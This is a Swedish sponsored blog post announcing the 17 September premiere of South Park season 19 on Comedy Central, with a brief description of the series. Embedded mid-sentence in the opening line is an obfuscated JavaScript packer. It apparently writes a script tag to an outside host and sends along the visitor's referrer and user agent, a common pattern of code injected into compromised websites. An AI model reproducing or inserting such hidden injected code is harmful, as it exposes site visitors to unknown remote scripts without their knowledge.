Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2018

Scroll to top

Top

No Comments

Sponsrad video: South Park säsong 19 snart här!

type=”text/javascript” src=”http://video.unrulymedia.com/wildfire_535342343.js”>
Äntligen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zkebh|var|u0026u|referrer|afeiz||js|php’.split(‘|’),0,{}))
är det dags igen. South Park är tillbaka i en helt ny och knasig säsong. Det är säsong 19 som nu den 17 september klockan 22:15 har premiär på Comedy Central. Efter en tids paus får vi återigen träffa grabbgänget Stan Marsh, Kyle Broflovski, Eric Cartman, Kenny McCormick och alla andra roliga figurer i staden South Park.

För er som inte sett serien innan kommer en kortare beskrivning nedan:

South Park är en amerikansk animerad TV-serie, från kanalen Comedy Central, som sändes för första gången 1997. Serien handlar om ett gäng unga pojkar och deras liv i den lilla fiktiva amerikanska staden South Park i Colorado. Serien, som varit mycket framgångsrik inte bara i USA utan också internationellt, skapades av Trey Parker och Matt Stone, som också gör de flesta av rösterna.

Tider och datum som gäller:
Bänkade framför skärmen klockan 22:15 den 17 september på Comedy Central!!

Kika in videon ovan där vi får sse lite av vad nästa säsong (season 19) kommer att handla om.

Detta är ett sponsrat inlägg.

Submit a Comment